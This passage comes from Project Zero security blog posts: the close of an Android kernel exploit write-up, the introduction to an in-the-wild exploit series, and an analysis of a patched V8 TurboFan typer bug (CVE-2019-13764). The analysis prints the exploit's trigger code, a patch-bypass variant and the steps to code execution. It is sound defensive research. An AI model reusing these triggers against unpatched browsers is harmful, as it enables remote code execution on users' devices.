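                                                   c->args[2], c->args[3],
                                                   c->args[4]);
        break;
    default:
        return 0;   /* idle or already done: nothing to do */
    }
    c->op = CMD_DONE;
    return 1;
}
```

A busy-poll is then just service_one() called in a loop, with the requester filling in addr, value and args before setting op.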

Even though the primitive was hacky and the system was not yet stable, I decided to stop developing the exploit at this point because my read/write/execute primitive was sufficiently powerful that subsequent exploitation steps would be fully independent of the original bug. I felt that I had achieved the goal of exploring the differences between kernel exploitation on Android and iOS.


So, what are my takeaways from developing this Android exploit?

Overall, the quality of the hardware mitigations on the Samsung Galaxy S10 was much stronger than I had expected. My uninformed expectation about the state of hardware mitigation adoption on Android devices was that it lagged significantly behind iOS. And in broad strokes that's true: the iPhone XS's A12 SOC supports ARMv8.3-A compared to the Qualcomm Snapdragon 855's ARMv8.2-A, and the A12 includes a few Apple-custom mitigations (KTRR, APRR+PPL) not present in the Snapdragon SOC. However, the mitigation gap was substantially smaller than I had been expecting, and there were even a few ways that the Galaxy S10 supported stronger mitigations than the iPhone XS, for instance by using unprivileged load/store operations during copy_from/to_user(). And as interesting as Apple's custom mitigations are on iOS, they would not have blocked this exploit from obtaining kernel read/write.

In terms of the software, I had expected Android to provide significantly weaker and more limited kernel manipulation primitives (heap shaping, target objects to corrupt, etc.) than what's provided by the Mach microkernel portion of XNU, and this also seems largely true. I suspect that part of the reason that public iOS exploits all seem to follow very similar exploit flows is that the pre- and post-exploitation primitives available to manipulate the kernel are exceptionally powerful and flexible. Having powerful manipulation primitives allows you to obtain powerful exploitation primitives more quickly, with less of the exploit flow specific to the exact constraints of the bug. In the case of this Android exploit, it's hard for me to speak generally given my lack of familiarity with the platform. I did manage to find good heap manipulation primitives, so the heap shaping part of the exploit was straightforward and generic. On the other hand, I struggled to find stack frames amenable to manipulation, which forced me to dig through lots of technical constraints to find strategies that would just barely work. As a result, the exploit flow to get kernel read/write/execute is highly specific to the underlying vulnerability until the last step. I'm thus left feeling that there are almost certainly much more elegant ways to exploit the NPU bugs than the strategy I chose.

Despite all these differences between the two platforms, I was overall quite surprised with the similarities and parallels that did emerge. Even though the final exploit flow for this NPU bug ended up being quite different, there were many echoes of the oob_timestamp exploit along the way. Thus my past experience developing iOS kernel exploits did in fact help me come up with ideas worth trying on Android, even if most of those ideas didn't pan out.

Introducing the In-the-Wild Series

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.

At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is the tracking of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be a gap in the security community’s ability to detect 0-day exploits.

Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor.

We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.

Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.

From the exploit servers, we have extracted:

  • Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.
  • Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.
  • A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android.

The four 0-days discovered in these chains have been fixed by the appropriate vendors:

  • CVE-2020-6418 - Chrome Vulnerability in TurboFan (fixed February 2020)
  • CVE-2020-0938 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1020 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1027 - Windows CSRSS Vulnerability (fixed April 2020)

We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attacker used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end user's device before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine which parameters decided between the "fast" and "slow" exploitation paths.

The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.

The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:

  • Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,
  • A deep look into the bug class of one of the Chrome exploits, and
  • An in-depth teardown of the Android post-exploitation code.

In addition, we are posting root cause analyses for each of the four 0-days discovered as a part of these exploit chains.

Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.

We recommend reading the posts in the following order:

  1. Introduction (this post)
  2. Chrome: Infinity Bug
  3. Chrome Exploits
  4. Android Exploits
  5. Android Post-Exploitation
  6. Windows Exploits

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 2: Chrome Infinity Bug.

In-the-Wild Series: Chrome Infinity Bug

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also inserts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);
if (a > 2) {
  return 3;
}
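A toy version of this range reasoning, written in C to match the other examples, shows how the branch gets folded. It is a sketch, not V8's typer: struct range and the helper names are hypothetical, and real TurboFan types also track NaN, -0 and non-number cases, which this model ignores.

```c
#include <assert.h>
#include <math.h>
#include <stdbool.h>

/* Closed interval of values a node may take (NaN and -0 ignored). */
struct range { double min, max; };

static double dmin(double a, double b) { return a < b ? a : b; }

/* Range of an arbitrary number. */
struct range range_any(void) {
    struct range r = { -INFINITY, INFINITY };
    return r;
}

/* Typing rule for Math.min(a, b): each bound is the smaller input bound. */
struct range type_math_min(struct range a, struct range b) {
    struct range r = { dmin(a.min, b.min), dmin(a.max, b.max) };
    assert(r.min <= r.max);
    return r;
}

/* `x > c` can only be true if the range reaches above c; otherwise the
 * comparison folds to false and the branch can be removed. */
bool may_be_greater_than(struct range x, double c) {
    return x.max > c;
}
```

Here type_math_min(range_any(), (struct range){ 1, 1 }) yields [-Infinity; 1], so may_be_greater_than(..., 2) is false and the if statement is dead code.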
Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);
let array = [1, 2, 3];
return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that, at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {
  deoptimize();
}
let elements = array.[[elements]];
return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.
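The elimination step boils down to comparing the range the typer believes against the array length. This hypothetical C sketch models the example above (the typer believes [0; 2], the array has length 3, the actual value can reach 4) in the case where a check judged redundant is removed outright; the names are illustrative only.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Range the typer believes a node has. */
struct range { double min, max; };

/* The `index >= length` check looks redundant when the believed range
 * lies entirely inside [0, length). */
bool bounds_check_redundant(struct range believed, size_t length) {
    assert(believed.min <= believed.max);
    return believed.min >= 0 && believed.max < (double)length;
}

/* Once the check has been eliminated, nothing stops an actual index the
 * typer did not predict: true means the access lands out of bounds. */
bool access_goes_oob(struct range believed, double actual_index, size_t length) {
    return bounds_check_redundant(believed, length) &&
           (actual_index < 0 || actual_index >= (double)length);
}
```

With the believed range [0; 2] the check is dropped for a three-element array, so an actual index of 3 or 4 reads past the end; a correct range of [0; 4] would have kept the check.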

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true
a = a * 10;  // predicted = 0; actual = 10
let array = [1, 2, 3];
return array[a];
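The propagation in this example amounts to pushing an interval through a multiplication. In this hypothetical C sketch, the predicted type {false} becomes the range [0; 0] after multiplying by 10, while the actual value true becomes 10, well outside the three-element array. The helper names are illustrative, not V8 functions.

```c
#include <assert.h>

struct range { double min, max; };

/* ToNumber on a boolean: false -> 0, true -> 1. */
struct range range_of_bool(int may_be_false, int may_be_true) {
    assert(may_be_false || may_be_true);
    struct range r = { may_be_false ? 0 : 1, may_be_true ? 1 : 0 };
    return r;
}

/* Range of x * k for a constant k >= 0. */
struct range range_mul_nonneg_const(struct range x, double k) {
    assert(k >= 0);
    struct range r = { x.min * k, x.max * k };
    return r;
}
```

The typer's prediction, range_mul_nonneg_const(range_of_bool(1, 0), 10), is [0; 0], whereas the value actually produced at runtime corresponds to range_of_bool(0, 1) scaled to [10; 10].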

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {
  [...]
  // We only handle integer induction variables (otherwise ranges
  // do not apply and we cannot do anything).
  if (!initial_type.Is(typer_->cache_->kInteger) ||
      !increment_type.Is(typer_->cache_->kInteger)) {
    // Fallback to normal phi typing, but ensure monotonicity.
    // (Unfortunately, without baking in the previous type,
    // monotonicity might be violated because we might not yet have
    // retyped the incrementing operation even though the increment's
    // type might been already reflected in the induction variable
    // phi.)
    Type type = NodeProperties::IsTyped(node)
                    ? NodeProperties::GetType(node)
                    : Type::None();
    for (int i = 0; i < arity; ++i) {
      type = Type::Union(type, Operand(node, i), zone());
    }
    return type;
  }
  // If we do not have enough type information for the initial value
  // or the increment, just return the initial value's type.
  if (initial_type.IsNone() ||
      increment_type.Is(typer_->cache_->kSingletonZero)) {
    return initial_type;
  }
  [...]
  InductionVariable::ArithmeticType arithmetic_type =
      induction_var->Type();
  double min = -V8_INFINITY;
  double max = V8_INFINITY;
  double increment_min;
  double increment_max;
  if (arithmetic_type ==
      InductionVariable::ArithmeticType::kAddition) {
    increment_min = increment_type.Min();
    increment_max = increment_type.Max();
  } else {
    increment_min = -increment_type.Max();
    increment_max = -increment_type.Min();
  }
  if (increment_min >= 0) {
    // increasing sequence
    min = initial_type.Min();
    for (auto bound : induction_var->upper_bounds()) {
      Type bound_type = TypeOrNone(bound.bound);
      // If the type is not an integer, just skip the bound.
      if (!bound_type.Is(typer_->cache_->kInteger)) continue;
      // If the type is not inhabited, then we can take the initial
      // value.
      if (bound_type.IsNone()) {
        max = initial_type.Max();
        break;
      }
      double bound_max = bound_type.Max();
      if (bound.kind == InductionVariable::kStrict) {
        bound_max -= 1;
      }
      max = std::min(max, bound_max + increment_max);
    }
    // The upper bound must be at least the initial value's upper
    // bound.
    max = std::max(max, initial_type.Max());
  } else if (increment_max <= 0) {
    // decreasing sequence
    [...]
  } else {
    // Shortcut: If the increment can be both positive and negative,
    // the variable can go arbitrarily far, so just return integer.
    return typer_->cache_->kInteger;
  }
  return Type::Range(min, max, typer_->zone());
}

Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.
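The increasing-sequence branch can be restated in a few lines. This is a simplified model, assuming types are plain `{min, max}` pairs of JavaScript numbers; it drops V8's `Type` class and the checks on the bound types, and `typeIncreasingPhi` is a hypothetical name.

```javascript
// Simplified model of the "increasing sequence" branch of
// TypeInductionVariablePhi. Each type is a {min, max} pair.
function typeIncreasingPhi(initial, increment, upperBounds) {
  if (increment.min < 0) throw new Error("model only covers increasing loops");
  let max = Infinity;
  for (const { bound, strict } of upperBounds) {
    // For `i < bound` the largest value that still enters the body is bound - 1.
    const boundMax = strict ? bound.max - 1 : bound.max;
    // One more increment may push the variable past the bound.
    max = Math.min(max, boundMax + increment.max);
  }
  // The upper bound must be at least the initial value's upper bound.
  max = Math.max(max, initial.max);
  return { min: initial.min, max };
}

// for (var i = 0; i < 10; i += 1) { ... }
console.log(typeIncreasingPhi(
  { min: 0, max: 0 },
  { min: 1, max: 1 },
  [{ bound: { min: 10, max: 10 }, strict: true }],
)); // { min: 0, max: 10 }
```

For an ordinary loop the result is the expected [0, 10]: the last value that passes `i < 10` is 9, and one more increment yields 10.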

Note that the algorithm only works with integers; otherwise, a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type has two unusual properties that made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.
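A small predicate makes these two properties concrete. It is a hypothetical approximation of the typer's integer type written in JavaScript, assuming membership means "a number with no fractional part, other than NaN and -0"; it is not how V8 represents types internally.

```javascript
// Approximates membership in the typer's integer type: whole numbers,
// including both infinities, but excluding NaN and -0.
function isTyperInteger(x) {
  return typeof x === "number" &&
    !Number.isNaN(x) &&
    !Object.is(x, -0) &&
    Math.trunc(x) === x;
}

const lhs = -Infinity;
const rhs = Infinity;
// Both operands belong to the type, but their sum does not.
console.log(isTyperInteger(lhs), isTyperInteger(rhs), isTyperInteger(lhs + rhs)); // true true false
```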

Thus, for the following loop the algorithm infers (-Infinity, +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author had to make only two minor changes: (1) parameterize increment so that, during the initial invocations in the interpreter, the value of i matches the type that will be inferred later, and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {
  var j = 0;
  var increment = 100;
  if (argument > 2) {
    increment = Infinity;
  }
  for (var i = -Infinity; i <= -Infinity; i += increment) {
    j++;
    if (j == 20) {
      break;
    }
  }
  [...]

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.
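Running just the loop from the trigger function above in an ordinary JavaScript shell shows why increment is parameterized. During warm-up calls (argument <= 2), adding a finite increment to -Infinity leaves i at -Infinity, a value consistent with the range the compiler will later infer; only a call with a larger argument makes i NaN. `loopPart` is a hypothetical name for this excerpt, and no JIT compilation is involved here.

```javascript
// The loop part of the trigger function, returning the final value of i.
function loopPart(argument) {
  var j = 0;
  var increment = 100;
  if (argument > 2) {
    increment = Infinity;
  }
  for (var i = -Infinity; i <= -Infinity; i += increment) {
    j++;
    if (j == 20) {
      break;
    }
  }
  return { i, iterations: j };
}

console.log(loopPart(0)); // { i: -Infinity, iterations: 20 }
console.log(loopPart(3)); // { i: NaN, iterations: 1 }
```

With increment = Infinity, the first addition computes -Infinity + Infinity, which is NaN, and the comparison NaN <= -Infinity is false, so the loop exits immediately.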


The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similar to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works on ARM processors. For the reader’s convenience, we’ve modified it to work on x64 as well.


  // The comments display the current value of the variable i, the type
  // inferred by the compiler, and the machine type used to store
  // the value at each step.
  // Initially:
  // actual = NaN, inferred = (-Infinity, +Infinity)
  // representation = double
  i = Math.max(i, 0x100000800);
  // After step one:
  // actual = NaN, inferred = [0x100000800, +Infinity)
  // representation = double
  i = Math.min(0x100000801, i);
  // After step two:
  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]
  // representation = int64_t
  i -= 0x1000007fa;
  // After step three:
  // actual = -2042, inferred = [6, 7]
  // representation = int32_t
  i >>= 1;
  // After step four:
  // actual = -1021, inferred = 3
  // representation = int32_t
  i += 10;
  // After step five:
  // actual = -1011, inferred = 13
  // representation = int32_t
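The arithmetic in these comments can be checked with a short replay. The sketch assumes, as the following paragraph explains, that CVTTSD2SI turns NaN into the indefinite integer value -0x8000000000000000 and that step three keeps only the low 32-bit word of i before subtracting 0x7fa (the low word of 0x1000007fa). BigInt models the 64-bit value exactly; the function names are hypothetical.

```javascript
// "actual" column: what the generated machine code computes.
function replayActual() {
  const stepTwo = -(2n ** 63n);                      // NaN -> -0x8000000000000000
  const low32 = Number(BigInt.asIntN(32, stepTwo));  // high word discarded: 0
  const stepThree = low32 - 0x7fa;                   // -2042
  const stepFour = stepThree >> 1;                   // -1021
  const stepFive = stepFour + 10;                    // -1011
  return [stepTwo, stepThree, stepFour, stepFive];
}

// "inferred" column: [min, max] ranges as the typer sees them. Subtraction,
// shifting and addition are monotonic, so mapping both ends is enough.
function replayInferred() {
  const stepTwo = [0x100000800, 0x100000801];
  const stepThree = stepTwo.map((v) => v - 0x1000007fa); // [6, 7]
  const stepFour = stepThree.map((v) => v >> 1);          // [3, 3]
  const stepFive = stepFour.map((v) => v + 10);           // [13, 13]
  return [stepThree, stepFour, stepFive];
}

console.log(replayActual(), replayInferred());
```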


The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.

Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable) &&
      node->opcode() != IrOpcode::kFinishRegion) {
    Node* constant = TryGetConstant(jsgraph(), node);
    if (constant != nullptr) {
      ReplaceWithValue(node, constant);
      return Replace(constant);
    }
  }
  return NoChange();
}

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant, thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because both of them can trigger deoptimization and are therefore not marked as kEliminatable.

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {
  [...]
  } else if (arity == 1) {
    Node* length = NodeProperties::GetValueInput(node, 2);
    Type length_type = NodeProperties::GetType(length);
    if (!length_type.Maybe(Type::Number())) {
      // Handle the single argument case, where we know that the value
      // cannot be a valid Array length.
      elements_kind = GetMoreGeneralElementsKind(
          elements_kind, IsHoleyElementsKind(elements_kind)
                             ? HOLEY_ELEMENTS
                             : PACKED_ELEMENTS);
      return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,
                            elements_kind, allocation,
                            slack_tracking_prediction);
    }
    if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&
        length_type.Max() <= kElementLoopUnrollLimit &&
        length_type.Min() == length_type.Max()) {
      int capacity = static_cast<int>(length_type.Max());
      return ReduceNewArray(node, length, capacity, *initial_map,
                            elements_kind, allocation,
                            slack_tracking_prediction);
    }
  [...]
}

When the argument is known to be an integer constant no greater than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and instead implements its own, less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding, the function keeps using the original argument node: the folded value is used to initialize the backing store, while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with a negative length and a backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the crafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.
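The effect of an unsigned comparison on a negative length can be modelled in JavaScript, where `>>> 0` reinterprets a value as an unsigned 32-bit integer. This models the comparison only, assuming a 32-bit length field; `passesUnsignedBoundsCheck` is a hypothetical helper, not V8 code.

```javascript
// Compares both operands as unsigned 32-bit integers.
function passesUnsignedBoundsCheck(index, length) {
  return (index >>> 0) < (length >>> 0);
}

const forgedLength = -1011; // the value obtained at step five
console.log(forgedLength >>> 0);                              // 4294966285
console.log(passesUnsignedBoundsCheck(12, forgedLength));     // true
console.log(passesUnsignedBoundsCheck(100000, forgedLength)); // true, far past the 13 slots
console.log(passesUnsignedBoundsCheck(13, 13));               // false for an honest array
```

Viewed as unsigned, -1011 is just over four billion, so practically every index passes the check while the backing store still holds only 13 elements.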

The rest of the trigger function is provided below:


  [...]
  corrupted_array = Array(i);
  corrupted_array[0] = 1.1;
  ptr_leak_array = [wasm_module, array_buffer, [...],
                    wasm_module, array_buffer];
  extra_array = [13.37, [...], 13.37, 1.234];
  return [corrupted_array, ptr_leak_array, extra_array];
}

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.
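Public V8 exploits commonly pair such a double array with two conversion helpers like the ones below, so that a value read out of bounds as a double can be treated as a raw 64-bit word, and a chosen 64-bit word can be written back as a double. The names `ftoi` and `itof` are customary in public write-ups and are not taken from this exploit; the sketch assumes an engine with BigUint64Array support.

```javascript
// One 8-byte buffer viewed both as a double and as an unsigned 64-bit integer.
const conversionBuffer = new ArrayBuffer(8);
const asFloat = new Float64Array(conversionBuffer);
const asBigInt = new BigUint64Array(conversionBuffer);

// Raw bit pattern of a double, e.g. a pointer read through the double array.
function ftoi(value) {
  asFloat[0] = value;
  return asBigInt[0];
}

// Double with the given bit pattern, e.g. a value to write through the array.
function itof(bits) {
  asBigInt[0] = bits;
  return asFloat[0];
}

console.log(ftoi(1.1).toString(16)); // 3ff199999999999a
console.log(itof(0x3ff199999999999an)); // 1.1
```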

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.
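Step 1 can be pictured as a linear scan over out-of-bounds slots. The sketch below is hypothetical: the exploit's real patterns are not reproduced here, `readSlot` stands in for an out-of-bounds read through the corrupted array, and the slots are simulated with an ordinary array. The marker values 13.37 and 1.234 merely mirror the constants visible in extra_array.

```javascript
// Returns the first slot index at which `pattern` appears, or -1.
// readSlot(i) is assumed to return the i-th 64-bit slot as a double.
function findPattern(readSlot, slotCount, pattern) {
  for (let start = 0; start + pattern.length <= slotCount; start++) {
    if (pattern.every((value, k) => Object.is(readSlot(start + k), value))) {
      return start;
    }
  }
  return -1;
}

// Simulated slots past the end of the corrupted array.
const slots = [0, 2.5e-310, 13.37, 13.37, 1.234, 7];
console.log(findPattern((i) => slots[i], slots.length, [13.37, 1.234])); // 3
```

Matching a short sequence rather than a single value reduces the chance of a false positive on an unrelated double that happens to equal a marker.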

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

Patch 1

Even though there’s evidence that this vulnerability was originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {
  for (var i = begin; i >= end; i += step) {
    step = end - begin;
    begin >>>= 805306382;
  }
}

var buffer = new ArrayBuffer(16384);
var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {
  write(Infinity, 1, view[65536], 1);
}

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, the V8 engineers initially considered it a low-severity issue. However, after an internal discussion, the V8 team raised the severity rating to high.

In light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:


[...]
const bool both_types_integer =
    initial_type.Is(typer_->cache_->kInteger) &&
    increment_type.Is(typer_->cache_->kInteger);
bool maybe_nan = false;
// The addition or subtraction could still produce a NaN, if the integer
// ranges touch infinity.
if (both_types_integer) {
  Type resultant_type =
      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)
          ? typer_->operation_typer()->NumberAdd(initial_type,
                                                 increment_type)
          : typer_->operation_typer()->NumberSubtract(initial_type,
                                                      increment_type);
  maybe_nan = resultant_type.Maybe(Type::NaN());
}
// We only handle integer induction variables (otherwise ranges
// do not apply and we cannot do anything).
if (!both_types_integer || maybe_nan) {
[...]

The code assumes that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but is demonstrated in the proof of concept sent to Chrome. The typer takes these changes into account and reflects them in increment’s computed type. Therefore, the attacker can, for example, add a negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;
var k = 0;
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.
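The gap in the first patch can be seen without a JIT. The sketch runs the variant loop in an ordinary shell and, separately, approximates the patched check by adding the initial value to the two extreme increment values. That approximation is an assumption made for illustration: V8's operation typer works on types rather than concrete values. `runVariant` is a hypothetical name.

```javascript
// The variant loop, returning the final loop variable and iteration count.
function runVariant() {
  var increment = -Infinity;
  var k = 0;
  for (var i = 0; i < 1; i += increment) {
    if (i == -Infinity) {
      increment = +Infinity;
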